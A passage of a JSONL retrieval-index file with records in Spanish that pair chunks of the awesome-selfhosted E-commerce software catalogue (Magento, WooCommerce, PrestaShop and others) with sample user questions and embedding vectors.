-0.04036, -0.02807, 0.00329, 0.00743, 0.04421, -0.05294, -0.02936, 0.10274, -0.06785, 0.05908, -0.04642, 0.08374, 0.10046, 0.009, -0.01048, -0.0131, 0.01719, 0.05672, 0.025, -0.00504, -0.00906, -0.08848, -0.04811, -0.04907, -0.04119, -0.06812, -0.05343, -0.00298, 0.11346, 0.01017, 0.08161, 0.12549, 0.01508, -0.03166, 0.03791, 0.02541, 0.13936, -0.09631, -0.05854, -0.04378, -0.03026, 0.04154, 0.00991, -0.06521, 0.06436, -0.03167, -0.00903, 0.0152, -0.17246, 0.07462, 0.00446, -0.02667, -0.0361, -0.08177, -0.01963, 0.00823, 0.08717, -0.04745, 0.00394, -0.004, 0.02991, 0.03704, -0.0142, 0.09501, -0.00111, -0.07783, -0.0278, -0.01987, 0.03931, 0.00662, 0.03869, 0.00175, 0.0683, -0.14479, 0.12022, 0.0173, -0.01688, 0.07365, -0.01109, -0.00279, 0.11789, -0.04006, -0.02047, -0.02351, 0.01489, 0.08979, -0.01747, -0.07526, 0.01691, -0.07309, -0.017, -0.02153, 0.0222, -0.02728, -0.07975, -0.02076, 0.01656, 0.05695, -0.01672, 0.041, -0.00662, 0.03445, 0.06735, 0.06266, 0.14316, 0.02142, -0.05643, -0.05855, -0.01466, -0.01547, -0.03887, 0.03988, 0.07228, 0.0035, 0.05691, 0.01143, -0.0925, 0.00276, -0.03083, -0.04463, 0.10769, 0.0745, 0.05667, -0.04292, 0.03304, 0.03253, -0.05317, 0.04481, 0.07364, -0.01302, -0.01831, 0.04999, -0.002, -0.07237, -0.01346, 0.10658, 0.00016, -0.07416, -0.08383, -0.00761, 0.01939, 0.00014, -0.0019, -0.02927, -0.02478, -0.04671, 0.06457, 0.04588, -0.00153, 0.03023, 0.0338, 0.054, -0.01338, -0.0493, -0.04932, 0.01767, -0.00695, -0.02087, 0.07407, -0.01809, -0.02655, 0.03706, 0.04385, -0.05832, -0.05525, -0.02501, -0.02591, 0.06002, -0.01249, -0.02834, 0.01267, 0.01033, 0.05467, -0.02214, -0.00335, 0.04931, 0.06033, 0.00921, -0.02045, 0.04572, -0.01093, -0.00424, 0.00778, -0.03555, -0.14123, -0.00037, -0.05399, -0.01628, 0.00376, 0.05141, 0.07434, -0.07225, -0.01998, -0.02923, 0.04425, -0.0099, -0.01147, 0.0036, -0.04243, -0.0642, -0.00189, -0.04668, -0.0363, -0.10831, -0.00513, -0.04662, -0.04485, -0.0031, 0.02892]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Aimeos β€” E-commerce framework for building custom online shops, market places and complex B2B applications scaling to billions of items with Laravel [LGPL-3.0/MIT, PHP]. Bagisto β€” Leading Laravel open source e-commerce framework with multi-inventory sources, taxation, localization, dropshipping and more exciting features [MIT, PHP]. CoreShop β€” E-commerce plugin for Pimcore [GPL-3.0, PHP]. Drupal Commerce β€” Popular e-commerce module for Drupal CMS, with support for dozens of payment, shipping, and shopping related modules [GPL-2.0, PHP]. EverShop β€” E-commerce platform with essential commerce features. Modular architecture and fully customizable [⚠, GPL-3.0, Docker/Nodejs]. Magento Open Source β€” Leading provider of open omnichannel innovation [OSL-3.0, PHP]. MedusaJs β€” Headless commerce engine that enables developers to create amazing digital commerce experiences [MIT, Nodejs]. Microweber β€” Drag and Drop CMS and online shop [MIT, PHP]. myCart β€” Shopping cart in 1 file (with support for payment by card or cryptocurrency) [⚠, MIT, Go/Docker].", "indexar": "cual es la alternativa libre a Magento si quiero gestionar millones de artΓ­culos?", "v": [-0.2557, 0.11638, 0.02279, -0.03164, -0.16909, 0.02015, -0.13001, -0.03358, -0.34469, -0.11224, -0.03624, -0.13146, 0.04795, 0.0495, 0.16166, 0.06526, 0.12379, -0.08894, 0.05638, 0.02082, -0.0411, -0.10628, -0.01564, -0.18424, -0.07597, -0.04561, -0.00343, -0.05983, -0.02563, 0.11541, -0.01674, -0.02665, -0.04883, -0.08718, 0.02956, 0.10161, 0.0815, 0.06719, 0.05681, -0.02291, -0.03108, -0.04841, -0.11579, 0.03924, 0.1033, -0.08992, 0.04821, 0.03513, 0.00236, 0.06303, -0.03635, -0.0137, -0.04539, -0.01754, 0.08146, 0.00585, 0.13229, -0.10557, 0.00519, -0.01799, -0.07631, 0.08899, 0.07684, 0.08871, -0.05704, 0.04689, 0.04173, 0.05345, -0.05964, 0.09044, -0.02716, -0.04593, 0.00412, 0.05854, -0.05473, 0.01864, 0.00636, -0.00092, -0.00843, 0.03772, 0.05226, -0.0414, -0.00398, 0.0032, -0.01812, -0.09717, -0.02891, -0.02303, 0.04989, 0.06134, -0.00433, -0.08492, -0.02592, -0.02532, -0.03782, -0.00234, 0.01532, 0.06076, -0.0016, 0.02968, -0.02795, 0.10662, -0.11234, -0.02146, 0.04183, 0.06621, -0.0596, -0.02168, -0.02358, 0.02475, -0.06681, 0.0467, 0.03498, -0.02728, 0.06425, 0.06079, -0.00957, 0.0877, 0.02233, -0.05427, -0.07055, -0.02457, 0.03668, -0.07004, 0.16387, 0.02712, 0.08806, 0.05088, -0.06671, -0.00367, 0.06624, -0.02371, 0.0352, -0.09642, -0.11281, -0.05191, 0.05209, 0.01937, -0.02425, -0.03901, -0.06972, -0.00207, -0.02146, 0.00602, 0.06749, -0.04233, 0.06794, -0.01792, 0.05935, -0.02898, 0.0613, -0.06144, -0.04133, 0.03905, -0.01041, -0.01094, -0.03286, -0.01321, -0.07268, 0.0851, 0.04342, -0.00417, -0.04754, 0.11053, -0.00513, -0.00919, -0.01486, 0.00558, -0.06604, -0.00689, 0.01269, 0.05286, 0.04641, -0.05883, 0.06048, -0.04467, 0.00799, -0.07578, 0.07043, -0.00091, 0.00902, 0.01173, -0.08859, 0.0355, 0.00347, -0.04899, -0.01489, 0.04965, -0.0489, 0.0551, 0.02415, 0.01346, -0.02012, -0.03872, 0.08709, -0.01949, -0.00124, -0.06527, -0.01642, -0.03265, -0.05726, -0.00305, 0.04318, -0.0075, -0.04782, -0.00808, -0.0603, 0.0149, 0.00294, -0.00215, 0.07769, 0.02934, 0.02328, 0.00335, -0.04929, 0.01303, 0.02024, 0.01477, -0.00591, 0.0254, 0.06312, -0.0311, -0.05088, 0.01017, 0.00121, 0.01081, 0.00699, 0.06374, -0.04108, 0.06765, -0.06729, -7e-05, 0.01663, 0.04248, -0.01303, -0.04091, 0.04085, -0.0089, 0.00215, 0.03535, 0.05947, 0.09907, -0.02142, -0.04715, -0.03444, 0.02951, -0.08828, -0.0267, -0.02252, -0.00647, -0.05032, 0.02551, 0.03482, -0.03111, 0.0468, -0.00104]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Aimeos β€” E-commerce framework for building custom online shops, market places and complex B2B applications scaling to billions of items with Laravel [LGPL-3.0/MIT, PHP]. Bagisto β€” Leading Laravel open source e-commerce framework with multi-inventory sources, taxation, localization, dropshipping and more exciting features [MIT, PHP]. CoreShop β€” E-commerce plugin for Pimcore [GPL-3.0, PHP]. Drupal Commerce β€” Popular e-commerce module for Drupal CMS, with support for dozens of payment, shipping, and shopping related modules [GPL-2.0, PHP]. EverShop β€” E-commerce platform with essential commerce features. Modular architecture and fully customizable [⚠, GPL-3.0, Docker/Nodejs]. Magento Open Source β€” Leading provider of open omnichannel innovation [OSL-3.0, PHP]. MedusaJs β€” Headless commerce engine that enables developers to create amazing digital commerce experiences [MIT, Nodejs]. Microweber β€” Drag and Drop CMS and online shop [MIT, PHP]. myCart β€” Shopping cart in 1 file (with support for payment by card or cryptocurrency) [⚠, MIT, Go/Docker].", "indexar": "con que puedo crear un e-commerce headless con Node.js?", "v": [0.0463, 0.00835, -0.10115, 0.01012, -0.05671, -0.07132, -0.09193, 0.12413, -0.01348, -0.0749, -0.22304, -0.07559, -0.0852, -0.11481, -0.04641, -0.06047, 0.14334, -0.00827, -0.00705, 0.08513, -0.09558, -0.07221, -0.15654, -0.00488, -0.06408, 0.02287, -0.03396, 0.07311, -0.2235, 0.13687, -0.03949, -0.05314, -0.02437, -0.10019, 0.00846, -0.0345, 0.08486, 0.09198, -0.12519, 0.03652, 0.10983, 0.00385, 0.00608, 0.02146, -0.05397, 0.01377, 0.11242, -0.07977, -0.0567, 0.09693, -0.01933, 0.04276, -0.29408, 0.09376, 0.10871, 0.15501, -0.03195, -0.08205, -0.04701, -0.02483, -0.055, -0.00762, 0.00178, -0.1245, -0.00278, -0.07625, 0.01085, -0.03889, 0.07683, 0.01569, 0.0211, 0.06517, -0.12381, -0.09985, 0.04423, 0.05399, -0.00194, 0.11988, -0.01357, 0.07808, 0.05043, -0.04539, -0.05447, 0.02093, 0.04013, -0.05683, -0.14879, 0.01307, -0.05183, -0.01977, 0.05595, 0.0483, -0.01914, -0.12026, -0.04238, 0.02988, -0.05008, -0.02979, 0.04564, 0.00805, -0.05625, 0.0558, -0.10071, 0.00067, 0.06773, -0.01674, 0.05873, -0.04239, -0.02463, 0.00217, 0.04794, -0.04892, -0.07122, -0.03346, -0.02102, -0.02842, -0.02753, -0.00148, 0.09706, 0.08609, -0.00725, -0.03374, -0.00969, -0.05983, 0.0117, 0.07035, -0.07662, 0.1135, -0.02137, -0.01956, 0.00135, -0.03481, 0.03546, -0.0249, -0.00557, 0.07677, -0.00312, 0.03673, -0.03036, 0.03988, -0.02299, -0.04079, -0.0297, 0.02197, 0.01587, -0.03633, -0.00651, -0.05885, -0.04274, 0.03906, 0.03114, 0.01472, -0.0268, 0.01145, -0.07413, 0.02145, 0.0116, -0.0134, 0.0734, 0.03889, -0.03075, 0.17958, 0.02913, 0.07063, -0.05076, 0.00631, -0.05618, -0.02188, 0.01315, 0.02182, -0.02556, -0.00988, 0.00509, -0.02977, 0.04769, 0.02753, -0.03266, -0.05952, -0.02104, -0.05113, -0.01166, 0.00833, -0.01064, 0.02762, -0.08111, -0.10314, -0.02542, -0.01716, -0.04548, 0.02778, -0.11354, 0.02366, -0.05195, 0.00025, 0.05546, -0.01033, 0.02422, -0.0387, -0.02418, 0.03819, -0.0496, 0.00833, 0.01549, -0.08402, -0.09203, -0.02542, -0.0406, 0.0434, 0.05392, -0.02582, -0.07099, -0.11516, 0.03774, -0.02304, -0.03832, -0.08334, -0.00333, -0.01418, 0.00393, -0.03676, -0.01395, -5e-05, 0.00512, 0.00367, 0.03172, 0.05755, -0.00983, 0.01449, 0.02098, -0.00404, -0.04991, -0.03997, -0.02622, -0.03374, 0.00117, -0.02004, -0.03138, 0.02319, -0.04353, 0.03504, 0.03275, 0.03392, -0.00131, -0.03429, 0.03554, -0.02741, -0.06511, -0.02047, -0.05284, -0.05683, -0.07482, -0.00654, 0.02497, 0.00101, -0.02095, 0.02969]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Open Source POS β€” Open Source Point of Sale is a web based point of sale system [MIT, PHP]. OpenCart β€” Shopping cart solution [GPL-3.0, PHP]. PrestaShop β€” Fully scalable e-commerce solution [OSL-3.0, PHP]. Pretix β€” Ticket sales platform for events [AGPL-3.0, Python/Docker]. s-cart β€” E-commerce website for individuals and businesses, built on top of Laravel Framework [MIT, PHP]. Saleor β€” Django based open-sourced e-commerce storefront [BSD-3-Clause, Docker/Python]. Shopware Community Edition β€” PHP based open source e-commerce software made in Germany [MIT, PHP]. Solidus β€” A free, open-source ecommerce platform that gives you complete control over your store [BSD-3-Clause, Ruby/Docker]. Spree Commerce β€” Spree is a complete, modular & API-driven open source e-commerce solution for Ruby on Rails [BSD-3-Clause, Ruby]. Sylius β€” Symfony2 powered open source full-stack platform for eCommerce [MIT, PHP]. Thelia β€” Thelia is an open source and flexible e-commerce solution [LGPL-3.0, PHP]. Vendure β€” A headless commerce framework [MIT, Nodejs].", "indexar": "quΓ© programas de caja son libres y funcionan en la web?", "v": [0.16069, 0.06355, -0.03521, 0.05256, -0.0287, -0.12868, 0.01871, 0.01558, -0.03135, -0.1078, -0.1505, -0.10368, -0.08873, -0.06025, 0.04947, 0.03684, 0.08744, -0.10712, 0.0426, 0.04386, -0.07186, -0.00511, -0.05764, -0.13669, -0.13385, 0.02019, 0.15262, -0.02817, -0.15453, 0.14317, 0.11942, 0.02041, 0.10012, -0.05305, 0.04236, 0.06607, 0.01666, 0.02927, 0.09198, 0.01206, 0.06259, 0.02315, 0.00944, 0.00128, 0.05962, 0.07318, 0.04922, -0.02579, -0.00281, -0.02552, -0.07831, -0.07693, 0.0169, -0.01564, 0.01213, -0.17134, 0.01929, -0.05871, -0.03466, 0.00803, -0.13066, 0.12333, 0.04923, 0.01939, 0.10415, -0.04264, 0.05314, 0.02, -0.0113, 0.08431, 0.05444, 0.00193, -0.00742, 0.02538, -0.02401, 0.04484, -0.1446, -0.02427, -0.00865, 0.04309, 0.13227, -0.02909, 0.04671, 0.13864, 0.0103, 0.02068, 0.07652, -0.06606, -0.04776, -0.03042, 0.02386, 0.09798, 0.02422, 0.14917, 0.02116, -0.03965, 0.02781, 0.10363, 0.1315, 0.09074, 0.06153, -0.0353, -0.09921, 0.03419, -0.05855, 0.09652, 0.02876, -0.01859, -0.05074, 0.01626, -0.00351, 0.01101, -0.09235, -0.02497, -0.13067, 0.05718, -0.04964, -0.01926, 0.03662, -0.06851, -0.11173, 0.05841, -0.0494, -0.02318, 0.03336, 0.01448, 0.04688, 0.06401, -0.05486, 0.10447, 0.03275, -0.05371, -0.10508, -0.05801, 0.01379, -0.10453, 0.03254, -0.01992, 0.06003, 0.00782, 0.02447, -0.0051, 0.00069, 0.0164, 0.06262, -0.09113, 0.04042, -0.01174, -0.03471, -0.03685, 0.02971, 0.01658, 0.08596, 0.04688, -0.04608, 0.00514, -0.02703, -0.04795, -0.07821, 0.01374, -0.01083, 0.0411, -0.01503, 0.03442, 0.06524, -0.00715, -0.0785, 0.00025, 0.00887, 0.07915, -0.00163, 0.09072, 0.08752, -0.10196, -0.0259, -0.00359, -0.07811, -0.01702, 0.05334, -0.06988, -0.02028, 0.06964, 0.05502, -0.01394, -0.06426, -0.06353, -0.01566, -0.04062, -0.00522, 0.05195, -0.02366, 0.03006, -0.05804, -0.00841, 0.03455, 0.07074, -0.03854, -0.0434, 0.10742, 0.01071, -0.05192, -0.07786, 0.0363, -0.03105, -0.04742, 0.07958, -0.01882, -0.01301, 0.02926, 0.12222, -0.02283, -0.00859, 0.03749, -0.00389, -0.08077, 0.0002, 0.06544, 0.03507, 0.05656, -0.02128, 0.06296, -0.03273, 0.02318, -0.03693, -0.00423, -0.03309, -0.01053, 0.0103, 0.08196, 0.01524, -0.02534, -0.04464, -0.08536, 0.00265, 0.02738, -0.00126, 0.03655, -0.00079, -0.02799, -0.05319, -0.04881, 0.09999, 0.011, -0.0456, 0.00596, -0.06422, -0.11261, -0.00697, -0.01867, -0.00102, -0.11224, 0.03932, 0.00068, -0.03416, 0.01186, 0.04786]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Open Source POS β€” Open Source Point of Sale is a web based point of sale system [MIT, PHP]. OpenCart β€” Shopping cart solution [GPL-3.0, PHP]. PrestaShop β€” Fully scalable e-commerce solution [OSL-3.0, PHP]. Pretix β€” Ticket sales platform for events [AGPL-3.0, Python/Docker]. s-cart β€” E-commerce website for individuals and businesses, built on top of Laravel Framework [MIT, PHP]. Saleor β€” Django based open-sourced e-commerce storefront [BSD-3-Clause, Docker/Python]. Shopware Community Edition β€” PHP based open source e-commerce software made in Germany [MIT, PHP]. Solidus β€” A free, open-source ecommerce platform that gives you complete control over your store [BSD-3-Clause, Ruby/Docker]. Spree Commerce β€” Spree is a complete, modular & API-driven open source e-commerce solution for Ruby on Rails [BSD-3-Clause, Ruby]. Sylius β€” Symfony2 powered open source full-stack platform for eCommerce [MIT, PHP]. Thelia β€” Thelia is an open source and flexible e-commerce solution [LGPL-3.0, PHP]. Vendure β€” A headless commerce framework [MIT, Nodejs].", "indexar": "con quΓ© puedo montar una tienda online sin pagar licencias?", "v": [0.07057, -0.00229, -0.16278, -0.07299, -0.07109, -0.07802, -0.01144, 0.0314, -0.19685, -0.08451, 0.02971, -0.11526, 0.13545, -0.07999, 0.08245, 0.04549, 0.02679, -0.15219, 0.17765, -0.01846, 0.04792, -0.02034, -0.04812, -0.10013, -0.01093, 0.01522, 0.12484, -0.17885, -0.20484, 0.16143, -0.00737, 0.03484, 0.09123, 0.01469, 0.04419, -0.0654, 0.01723, 0.06422, 0.15767, -0.07401, 0.10832, 0.04996, -0.00045, -0.04153, -0.07451, -0.06357, 0.04905, 0.01094, -0.00204, 0.00142, 0.02891, 0.01327, -0.09204, -0.09623, 0.08484, -0.02391, 0.1399, 0.05355, 0.16519, 0.00752, -0.04473, 0.02595, 0.09508, 0.04785, -0.03713, 0.05707, 0.05876, 0.0764, -0.0033, -0.07471, -0.08757, -0.05478, -0.02233, -0.03303, -0.08516, 0.02881, -0.04514, -0.08119, 0.05649, 0.08401, 0.09544, 0.00809, -0.01024, 0.0087, 0.01511, -0.0427, -0.06514, -0.03953, 0.08682, 0.03033, -0.0346, 0.09656, -0.03006, 0.0013, 0.04337, -0.12501, 0.04035, 0.02858, -0.04065, 0.01596, -0.1283, 0.09019, -0.00958, -0.02415, -0.03396, 0.0182, 0.07275, -0.06325, -0.00102, -8e-05, 0.03846, 0.0347, -0.13629, 0.00072, 0.01642, 0.01467, 0.03103, 0.05208, -0.00451, 0.15369, -0.01604, 0.04062, 0.07189, -0.03759, 0.06278, 0.0275, 0.03699, 0.20639, -0.09885, -0.09513, -0.04141, -0.01881, 0.08754, -0.00579, 0.01489, 0.04685, -0.05382, -0.00875, -0.10887, 0.01902, 0.03496, -0.06107, -0.01494, 0.05253, 0.05057, 0.00401, -0.03409, -0.06395, -0.05663, -0.04111, 0.03275, 0.08992, 0.01251, 0.04367, -0.01521, 0.04031, -0.0201, -0.05955, 0.06345, 0.06266, 0.0425, 0.11663, -0.0146, -0.05427, -0.03864, 0.01877, -0.07181, 0.05668, 0.03193, 0.02671, -0.00653, 0.00651, -0.01049, -0.01466, 0.08205, 0.05809, -0.06441, -0.02195, 0.00966, 0.0221, -0.03876, 0.01806, -0.0203, -0.0243, -0.04757, 0.02485, 0.01282, 0.01386, -0.03148, 0.06611, -0.02029, -0.00696, -0.04496, 0.01734, 0.04404, 0.00134, -0.01569, 0.03397, -0.01287, -0.02714, -0.04309, -0.03069, -0.04869, 0.00913, 0.03055, -0.06729, -0.02615, 0.07396, -0.00318, 0.00593, -0.0727, -0.05612, -0.00286, -0.05966, -0.02374, 0.02153, -0.00573, -0.03205, -0.06848, 0.0322, 0.05133, 0.02412, 0.01836, 0.04354, 0.0633, 0.02161, 0.02244, 0.00944, 0.0122, 0.02476, -0.04534, -0.02553, -0.04564, -0.04534, 0.00118, -0.02259, 0.0259, 0.06843, -0.05391, 0.03254, -0.00413, 0.03321, 0.02934, -0.00733, -0.00073, -0.03631, -0.07515, -0.05271, -0.04534, -0.03741, -0.05021, 0.04213, -0.00776, 0.01703, 0.00153, 0.01639]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Open Source POS β€” Open Source Point of Sale is a web based point of sale system [MIT, PHP]. OpenCart β€” Shopping cart solution [GPL-3.0, PHP]. PrestaShop β€” Fully scalable e-commerce solution [OSL-3.0, PHP]. Pretix β€” Ticket sales platform for events [AGPL-3.0, Python/Docker]. s-cart β€” E-commerce website for individuals and businesses, built on top of Laravel Framework [MIT, PHP]. Saleor β€” Django based open-sourced e-commerce storefront [BSD-3-Clause, Docker/Python]. Shopware Community Edition β€” PHP based open source e-commerce software made in Germany [MIT, PHP]. Solidus β€” A free, open-source ecommerce platform that gives you complete control over your store [BSD-3-Clause, Ruby/Docker]. Spree Commerce β€” Spree is a complete, modular & API-driven open source e-commerce solution for Ruby on Rails [BSD-3-Clause, Ruby]. Sylius β€” Symfony2 powered open source full-stack platform for eCommerce [MIT, PHP]. Thelia β€” Thelia is an open source and flexible e-commerce solution [LGPL-3.0, PHP]. Vendure β€” A headless commerce framework [MIT, Nodejs].", "indexar": "cuΓ‘les son las mejores alternativas gratuitas a los sistemas de e-commerce comerciales", "v": [0.18628, 0.10341, -0.00714, -0.00066, -0.00094, -0.10177, 0.02735, -0.00729, -0.23285, -0.07038, -0.12546, -0.05676, 0.01818, -0.10852, 0.08176, 0.00696, 0.02743, -0.1444, 0.04676, 0.0505, 0.01739, -0.06787, -0.10472, -0.02981, -0.10725, 0.00038, 0.03239, -0.09136, -0.14212, 0.21885, 0.1222, -0.01392, 0.07893, -0.14332, -0.04359, -0.06308, 0.06772, 0.02384, 0.01938, -0.09616, 0.12597, -0.10306, -0.03733, -0.10306, 0.02946, -0.01355, -0.08845, 0.02695, -0.08519, -0.06447, -0.05545, 0.01489, -0.07833, 0.00385, 0.15221, -0.0255, -0.02567, 0.03425, 0.05121, -0.04301, 0.06947, 0.0811, 0.05437, -0.04366, 0.07052, -0.03459, -0.05261, -0.05697, -0.06347, 0.01939, 0.02212, 0.0274, -0.0168, -0.0161, 0.03088, 0.13457, 0.02739, 0.11128, -0.01515, 0.07841, 0.07321, -0.06335, -0.05763, 0.06006, -0.05873, -0.03663, -0.06977, -0.04356, -0.01544, 0.01099, 0.07608, 0.0391, -0.03201, 0.0654, 0.02767, -0.04933, -0.02217, -0.02746, 0.01924, 0.12844, -0.01958, 0.00024, -0.09879, -0.01421, -0.08859, -0.01827, 0.0067, -0.06065, -0.01262, -0.06601, -0.07413, -0.07173, -0.02344, -0.05838, -0.02625, -0.05053, 0.0032, -0.07628, 0.00278, 0.04577, -0.09313, -0.00372, -0.00854, -0.03976, 0.05418, 0.10265, 0.03403, 0.11052, 0.01687, -0.03758, 0.01949, -0.00972, -0.02233, -0.04648, -0.04061, -0.00527, 0.04062, -0.01086, -0.05071, 0.00123, -0.01226, -0.04285, -0.02832, -0.00671, 0.06644, -0.00305, 0.04987, -0.10259, -0.00849, 0.01244, 0.00105, 0.02997, -0.00066, 0.05218, 0.02335, 0.01618, -0.00852, -0.08852, 0.05215, 0.07471, 0.01688, 0.04583, -0.01958, 0.01434, -0.01312, -0.00208, -0.05756, -0.00498, 0.05841, 0.04983, 0.02318, 0.09595, -0.00925, -0.10335, 0.01821, -0.02405, -0.00294, -0.07666, 0.06841, -0.09727, -0.07924, 0.00834, -0.05474, -0.01366, -0.08779, -0.05103, -0.06509, 0.00327, 0.06642, 0.08192, -0.04622, 0.01621, -0.10412, -0.03344, -0.0086, -0.05151, -0.04843, -0.05023, -0.06067, -0.00766, -0.13708, -0.04423, -0.01918, -0.09874, 0.00237, 0.06646, -0.00022, 0.08109, 0.03402, 0.0269, -0.06289, -0.03792, 0.04204, -0.10283, -0.04707, -0.04913, -0.004, -0.09003, -0.00255, -0.0014, 0.04584, 0.03493, 0.03751, -0.01419, -0.0037, 0.04694, 0.01603, 0.07184, 0.0277, 0.00428, -0.05023, 0.04476, -0.00268, -0.0545, 0.03216, 0.02699, 0.01933, -0.00872, -0.03835, -0.05409, 0.10091, 0.0992, -0.03002, -0.05868, -0.01057, -0.06139, -0.08894, 0.01998, 0.01705, -0.0948, -0.07935, 0.04484, 0.0179, -0.02818, 0.03017, -0.05495]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: WooCommerce β€” WordPress based e-commerce solution [GPL-3.0, PHP].", "indexar": "que programa de comercio electrΓ³nico estΓ‘ basado en WordPress?", "v": [0.06145, -0.03389, -0.07676, -0.16981, -0.04327, -0.04394, 0.11191, -0.09046, -0.09472, -0.1513, -0.12364, -0.05271, -0.00746, -0.0785, 0.0012, -0.10363, 0.04609, -0.0969, 0.1019, -0.0024, -0.01602, -0.11041, -0.0368, 0.00387, 0.02626, 0.02806, -0.12936, -0.00031, -0.09553, 0.13854, 0.0523, -0.03662, -0.04578, -0.06447, -0.0034, 0.04893, 0.06898, 0.10831, 0.09619, -0.05185, 0.08648, -0.0749, 0.05502, 0.03996, -0.074, -0.03018, 0.14963, -0.10757, 0.00658, -0.00047, -0.01456, 0.01497, -0.11636, 0.09954, 0.1568, 0.02204, -0.03322, -0.08854, -0.05104, 0.08936, 0.05017, 0.10736, 0.02879, -0.04378, -0.06087, 0.05196, 0.03935, 0.05803, -0.00518, 0.08509, 0.10347, -0.01824, -0.06917, -0.1605, -0.05585, 0.05727, 0.01584, 0.10547, 0.00699, -0.10312, 0.04284, -0.02685, 0.07403, 0.05954, -0.13793, -0.09886, -4e-05, 0.00352, -0.06203, 0.10327, 0.10579, 0.10647, -0.02941, 0.02034, 0.01448, -0.05622, -0.02156, -0.12735, 0.01947, 0.1564, 0.00783, 0.05606, -0.0222, 0.00215, 0.05279, 0.03763, 0.04767, 0.01368, -0.06188, -0.04552, -0.02284, 0.00419, -0.02262, -0.03357, -0.08138, -0.03475, 0.05266, -0.0494, 0.07841, 0.01558, -0.02213, 0.08547, -0.07681, -0.00661, 0.17995, 0.12121, -0.04042, 0.11303, 1e-05, -0.00227, 0.09203, -0.04261, -0.0529, 0.06758, -0.02035, 0.057, -0.02434, 0.05461, -0.01078, -0.00172, 0.023, -0.08511, 0.09385, 0.00109, 0.0653, -0.03084, 0.02036, -0.04909, -0.00791, 0.03894, -0.00676, 0.01383, -0.00469, 0.01153, -0.07243, 0.00515, 0.05738, -0.02284, 0.00776, 0.02016, -0.10033, 0.05362, -0.01222, -0.00913, -0.00524, -0.05244, -0.05848, 0.07928, 0.07729, -0.03426, -0.02461, 0.07383, 0.01776, -0.04098, 0.00431, 0.06606, -0.01677, -0.03956, 0.03297, -0.00147, -0.13797, 0.04802, 0.04171, 0.02671, -0.041, -0.01817, -0.08809, 0.03369, -0.06544, 0.02793, -0.05318, -0.02961, -0.01035, -0.01165, -0.02323, 0.02535, -0.05081, 0.05283, 0.03462, -0.02969, -0.05279, -0.05325, 0.05399, 0.02619, 0.0116, 0.05574, 0.02642, -0.02187, 0.03785, 0.04682, -0.08813, -0.08106, -0.03245, 0.0322, 0.00865, -0.06409, -0.02917, 0.01796, 0.02692, -0.00389, -0.00297, 0.05012, 0.04997, 0.00842, -0.01678, -0.06062, 0.05013, 0.03939, 0.04096, 0.02548, -0.11008, -0.07587, -0.01741, -0.03114, 0.01171, -0.03909, 0.00891, -0.0064, -0.05137, -0.03835, 0.0561, 0.0698, -0.03812, -0.04744, 0.02784, -0.00811, -0.09216, 0.03515, -0.00415, -0.01185, -0.07192, 0.01972, -0.03442, -0.04072, 0.00202, 0.06339]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: WooCommerce β€” WordPress based e-commerce solution [GPL-3.0, PHP].", "indexar": "cual es una alternativa libre a Shopify para crear tiendas online?", "v": [-0.10846, 0.03426, -0.12215, -0.05532, -0.06141, -0.15741, -0.04588, 0.02841, -0.14396, -0.07303, -0.06745, -0.19122, -0.0355, -0.0305, 0.00516, -0.08728, 0.06392, -0.1493, 0.14226, 0.05139, -0.0204, 0.00916, -0.17354, -0.0898, -0.04353, -0.11198, -0.00342, -0.02822, -0.17348, 0.16244, 0.06741, -0.03281, 0.0687, 0.00723, 0.02009, -0.11438, 0.15596, 0.03581, 0.02421, -0.03509, 0.12351, -0.03127, -0.03517, 0.06864, 0.02348, 0.02988, -0.00164, -0.00792, -0.05334, 0.15377, -0.00341, 0.05381, -0.13979, 0.01646, 0.13461, -0.01904, 0.07445, -0.04488, 0.03441, 0.02495, -0.09752, -0.02782, 0.0655, -0.07778, -0.0293, 0.05367, -0.06442, 0.01382, -0.07616, 0.05874, -0.0688, -0.05811, -0.03842, -0.08412, -0.0703, 0.09622, -0.08969, -0.04156, -0.0196, 0.0232, 0.05361, -0.06281, -0.01135, 0.01419, 0.02756, -0.10334, -0.0506, -0.01206, 0.04328, 0.01217, -0.04786, 0.01094, -0.05999, 0.03353, -0.02327, -0.07872, -0.00224, -0.03575, 0.01127, 0.14301, -0.03914, -0.0035, -0.04237, -0.04023, -0.06668, -0.07747, -0.04036, 0.09438, -0.05507, -0.03391, 0.05979, -0.03653, -0.00835, -0.00458, 0.10505, 0.02668, -0.00114, 0.07837, 0.02112, 0.13787, -0.05084, -0.03608, -0.08079, -0.09633, -0.01008, 0.0968, 0.0122, 0.04696, -0.06527, -0.01828, 0.0343, -0.01929, 0.02212, -0.12833, -0.04726, 0.01996, -0.00403, -0.01259, -0.01302, 0.00319, -0.02296, -0.05379, 